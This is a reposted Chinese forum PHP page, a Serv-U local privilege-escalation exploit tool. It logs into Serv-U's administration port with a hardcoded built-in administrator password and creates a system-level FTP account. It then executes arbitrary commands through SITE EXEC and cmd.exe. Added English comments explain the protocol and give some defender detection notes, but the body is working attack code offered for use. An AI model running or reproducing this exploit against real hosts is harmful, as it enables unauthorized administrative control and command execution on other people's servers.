来源:冰点论坛
作者:我非我
<html>
<head>
<title>Serv-U本地提升权限Exp10it By 我非我</title>
<meta content="text/html; charset=gb2312" http-equiv="Content-Type">
<STYLE TYPE="text/css">
b {font-family : Verdana, sans-serif;font-size : 14px;}
body,td,p,pre {
font-family : Verdana, sans-serif;font-size : 12px;
}
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
</STYLE>
</head>
<body bgcolor="#EEEEEE" text="#000000" link="#006699" vlink="#5493B4">
<form action="<?=$_SERVER['PHP_SELF']?>" method="get">
<center><b>Serv-U本地提升权限Exp10it By 我非我</b>
<center><b>提升权限部分</b>
<hr>
<table width="760" border="0" cellpadding="0">
<tr><td width="150">主机Ftp端口:</td> <td width="660"><input name="ftpport" type="text" class="INPUT" value="<?=$_GET['ftpport']?>"></td></tr>
<tr><td width="150">添加的用户名:</td> <td width="660"><input name="user" type="text" class="INPUT" value="<?=$_GET['user']?>"></td></tr>
<tr><td width="150">添加的用户名密码:</td><td width="660"><input name="password" type="password" class="INPUT" value="<?=$_GET['password']?>"></td></tr>
<tr><td width="150">用户主目录(别忘了写"\"):</td> <td width="660"><input name="homedir" type="text" class="INPUT" value="<?=$_GET['homedir']?>"></td></tr>
<tr><td width="660"><input name="action" type="hidden" value="up"></td></tr>
<tr><td width="150"><input type="submit" class="INPUT" value="提升"></td></tr>
</form></tr>
</table></center><hr>
<textarea cols="80" rows="15" readonly>命令回显:
<?if ($_GET['action']=="up"){
// Dispatch for the first form. All four values are read straight from the
// query string with no validation or escaping; the form above also reflects
// the same $_GET values into value="" attributes without htmlspecialchars().
// Whatever up() echoes lands inside the enclosing <textarea>.
// NOTE: this block uses the "<?" short open tag, so it only runs where
// short_open_tag is enabled.
up($_GET['ftpport'],$_GET['user'],$_GET['password'],$_GET['homedir']);
}
?>
</textarea><hr>
<form action="<?=$_SERVER['PHP_SELF']?>" method="get">
<center><b>Serv-U本地提升权限Exp10it By 我非我</b>
<center><b>执行命令部分</b>
<hr>
<table width="760" border="0" cellpadding="0">
<tr><td width="100">主机Ftp端口:</td> <td width="660"><input name="ftpport" type="text" class="INPUT" value="<?=$_GET['ftpport']?>"></td></tr>
<tr><td width="100">用户名:</td> <td width="660"><input name="user" type="text" class="INPUT" value="<?=$_GET['user']?>"></td></tr>
<tr><td width="100">用户名密码:</td><td width="660"><input name="password" type="password" class="INPUT" value="<?=$_GET['password']?>"></td></tr>
<tr><td width="100">执行的命令:</td> <td width="660"><input name="cmd" type="text" class="INPUT" value="<?=$_GET['cmd']?>"></td></tr>
<tr><td width="660"><input name="action" type="hidden" value="execute"></td></tr>
<tr><td width="100"><input type="submit" class="INPUT" value="执行"></td></tr>
</form></tr></table></center><hr>
<textarea cols="80" rows="15" readonly>命令回显:
<?if ($_GET['action']=="execute"){
// Dispatch for the second form. Port, credentials and the command line are
// passed through from $_GET unvalidated, and ftpcmd() echoes the raw server
// transcript into the enclosing <textarea>. Same "<?" short-tag caveat as
// the first dispatch block.
ftpcmd($_GET['ftpport'],$_GET['user'],$_GET['password'],$_GET['cmd']);
}
?></textarea><hr>
<?php
// Creates a Serv-U account by talking to the server's administration
// listener on 127.0.0.1:43958 and pushing a SETUSERSETUP block over the
// SITE MAINTENANCE channel. This is the "privilege escalation" half of the
// page: the socket is opened to loopback, so it only works from code that
// already runs on the Serv-U host -- hence "local" in the page title.
//
// Parameters (the caller passes them verbatim from $_GET, no validation):
//   $ftpport  - port of the FTP domain the account is added to (-PortNo)
//   $user     - name of the account to create (-User)
//   $password - its password (-Password)
//   $homedir  - home directory (-HomeDir); reused in the Access line
// Returns nothing. Every line the server sends back is echoed raw at the end.
//
// Defender notes: the account and password sent below are fixed in the code,
// not supplied by the caller -- historically Serv-U's built-in local
// administrator login, which is what the technique relies on. Things worth
// watching for on a Serv-U host: connections to 43958 from processes other
// than the Serv-U administrator, SITE MAINTENANCE sessions in the server
// log, and accounts appearing with Maintenance=System that nobody created.
function up($ftpport,$user,$password,$homedir){
// Loopback only, 30 s connect timeout.
$fp = fsockopen ("127.0.0.1", 43958, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)<br>\n";
} else {
// Fire-and-forget login: nothing is read from the socket until the loop at
// the bottom, so a rejected USER/PASS is not detected here -- the failure
// only shows up in the echoed transcript. The sleep() calls are the only
// pacing between commands.
fputs ($fp, "USER LocalAdministrator\r\n");
sleep (1);
fputs ($fp, "PASS #l@\$ak#.lk;0@P\r\n");
sleep (1);
fputs ($fp, "SITE MAINTENANCE\r\n");
sleep (1);
// Multi-line SETUSERSETUP command. Lines prefixed with "-" continue the
// command; the final " Access=" line (leading space, no dash) appears to
// terminate it -- TODO confirm against the Serv-U maintenance protocol.
fputs ($fp, "-SETUSERSETUP\r\n");
fputs ($fp, "-IP=0.0.0.0\r\n");
fputs ($fp, "-PortNo=".$ftpport."\r\n");
fputs ($fp, "-User=".$user."\r\n");
fputs ($fp, "-Password=".$password."\r\n");
fputs ($fp, "-HomeDir=".$homedir."\r\n");
fputs ($fp, "-LoginMesFile=\r\n");
fputs ($fp, "-Disable=0\r\n");
fputs ($fp, "-RelPaths=0\r\n");
fputs ($fp, "-NeedSecure=0\r\n");
fputs ($fp, "-HideHidden=0\r\n");
fputs ($fp, "-AlwaysAllowLogin=0\r\n");
fputs ($fp, "-ChangePassword=1\r\n");
fputs ($fp, "-QuotaEnable=0\r\n");
fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");
fputs ($fp, "-SpeedLimitUp=-1\r\n");
fputs ($fp, "-SpeedLimitDown=-1\r\n");
fputs ($fp, "-MaxNrUsers=-1\r\n");
fputs ($fp, "-IdleTimeOut=600\r\n");
fputs ($fp, "-SessionTimeOut=-1\r\n");
fputs ($fp, "-Expire=0\r\n");
fputs ($fp, "-RatioUp=1\r\n");
fputs ($fp, "-RatioDown=1\r\n");
fputs ($fp, "-RatiosCredit=0\r\n");
fputs ($fp, "-QuotaCurrent=0\r\n");
fputs ($fp, "-QuotaMaximum=0\r\n");
// Presumably this is the setting that makes the new account administrative
// rather than an ordinary FTP user, i.e. the escalation step -- verify.
fputs ($fp, "-Maintenance=System\r\n");
fputs ($fp, "-PasswordType=Regular\r\n");
fputs ($fp, "-Ratios=None\r\n");
// The "│" is probably a mis-encoded "|" separator (the page is served as
// gb2312); RWAMELCDP looks like a set of per-directory access flags for
// $homedir -- neither is verifiable from this file.
fputs ($fp, " Access=".$homedir."│RWAMELCDP\r\n");
sleep (1);
// Query the account back so the transcript shows whether it now exists.
fputs ($fp, "-GETUSERSETUP\r\n");
fputs ($fp, "-IP=0.0.0.0\r\n");
fputs ($fp, "-PortNo=".$ftpport."\r\n");
fputs ($fp, " User=".$user."\r\n");
sleep (1);
fputs ($fp, "QUIT\r\n");
sleep (1);
// Dump everything the server said, unescaped, into the surrounding
// <textarea>; a reply containing markup or "</textarea>" would break out
// of it (no htmlspecialchars()). Blocks until the server closes the socket.
while (!feof($fp)) {
echo fgets ($fp,128);
}
fclose ($fp);
}
}
// Sends one command line through an FTP account (typically the one created
// by up()) using the FTP "SITE EXEC" extension. Connects to the FTP service
// on this host at $ftpport, logs in as $user/$password, sends the command
// verbatim and echoes the raw server transcript. Returns nothing.
//
// Parameters (passed through from $_GET by the caller, unvalidated):
//   $ftpport  - local FTP port to connect to
//   $user     - FTP account name
//   $password - its password
//   $cmd      - text appended to "cmd.exe /c" without any quoting
//
// Defender notes: SITE EXEC requests and the account used for them are
// visible in the server's FTP log; an account that was created moments
// earlier via SITE MAINTENANCE and immediately issues SITE EXEC is the
// pattern this page produces.
function ftpcmd($ftpport,$user,$password,$cmd){
// Loopback only; $ftpport is whatever the query string said, 30 s timeout.
$conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 30);
if (!$conn_id) {
echo "$errstr ($errno)<br>\n";
} else {
// No reply is read between commands, so a failed login is only visible in
// the transcript echoed at the end.
fputs ($conn_id, "USER ".$user."\r\n");
sleep (1);
fputs ($conn_id, "PASS ".$password."\r\n");
sleep (1);
// $cmd is concatenated as-is into the SITE EXEC line. Whether the command's
// own output comes back over the control connection depends on the server;
// only the FTP reply lines are guaranteed to appear below.
fputs ($conn_id, "SITE EXEC c:\\windows\\system32\\cmd.exe /c ".$cmd."\r\n");
fputs ($conn_id, "QUIT\r\n");
sleep (1);
// Echo the transcript unescaped into the enclosing <textarea>; blocks until
// the server closes the connection.
while (!feof($conn_id)) {
echo fgets ($conn_id,128);
}
fclose($conn_id);
}
}
?>